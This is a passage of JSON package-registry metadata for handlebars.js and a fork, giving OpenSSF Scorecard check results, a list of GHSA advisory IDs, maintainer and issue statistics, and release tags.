analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35619777,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-07-18T13:36:00.175Z","dependent_packages_count":0,"downloads":75,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":27.861830190664723,"dependent_packages_count":40.490124132512705,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":34.17597716158871},"purl":"pkg:npm/%40langtail/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@langtail/handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@langtail/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@langtail/handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-06-27T16:02:08.459Z","issues_count":159,"pull_requests_count":133,"avg_time_to_close_issue":20724124.37864078,"avg_time_to_close_pull_request":16796463.59090909,"issues_closed_count":103,"pull_requests_closed_count":88,"pull_request_authors_count":53,"issue_authors_count":140,"avg_comments_per_issue":3.1446540880503147,"avg_comments_per_pull_request":1.699248120300752,"merged_pull_requests_count":57,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":1295892.0,"past_year_avg_time_to_close_pull_request":785742.2631578947,"past_year_issues_closed_count":6,"past_year_pull_requests_closed_count":19,"past_year_pull_request_authors_count":16,"past_year_issue_authors_count":16,"past_year_avg_comments_per_issue":1.2105263157894737,"past_year_avg_comments_per_pull_request":1.3823529411764706,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":16,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@langtail%2Fhandlebars/codemeta","maintainers":[{"uuid":"petrbrzek","login":"petrbrzek","name":null,"email":"petrbrzek@abdoc.net","url":null,"packages_count":72,"html_url":"https://www.npmjs.com/~petrbrzek","role":null,"created_at":"2024-06-21T18:46:17.304Z","updated_at":"2024-06-21T18:46:17.304Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/petrbrzek/packages"},{"uuid":"rychlis","login":"rychlis","name":null,"email":"rychlis@rychlis.cz","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~rychlis","role":null,"created_at":"2024-06-21T18:46:16.961Z","updated_at":"2024-06-21T18:46:16.961Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/rychlis/packages"},{"uuid":"khanenyao","login":"khanenyao","name":null,"email":"o.khanenya@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~khanenyao","role":null,"created_at":"2024-06-21T18:46:16.641Z","updated_at":"2024-06-21T18:46:16.641Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/khanenyao/packages"},{"uuid":"ltmwhyte","login":"ltmwhyte","name":null,"email":"soo.whyte@gmail.com","url":null,"packages_count":6,"html_url":"https://www.npmjs.com/~ltmwhyte","role":null,"created_at":"2024-08-26T07:51:08.622Z","updated_at":"2024-08-26T07:51:08.622Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ltmwhyte/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5780121,"name":"github.com/handlebars-lang/handlebars.js","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":[],"namespace":"github.com/handlebars-lang","versions_count":80,"first_release_published_at":"2012-07-31T16:50:55.000Z","latest_release_published_at":"2026-03-26T20:44:05.000Z","latest_release_number":"v4.7.9+incompatible","last_synced_at":"2026-07-19T22:22:29.724Z","created_at":"2023-01-02T01:04:25.141Z","updated_at":"2026-07-19T22:22:29.724Z","registry_url":"https://pkg.go.dev/github.com/handlebars-lang/handlebars.js","install_command":"go get github.com/handlebars-lang/handlebars.js","documentation_url":"https://pkg.go.dev/github.com/handlebars-lang/handlebars.js#section-documentation","metadata":{},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2025-08-19T20:53:19.000Z","size":4055,"stargazers_count":18474,"open_issues_count":111,"forks_count":2056,"subscribers_count":436,"default_branch":"master","last_synced_at":"2025-10-26T13:58:41.392Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2025-10-25T20:27:46.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281453692,"owners_count":26504232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-28T02:00:06.022Z","response_time":60,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/ta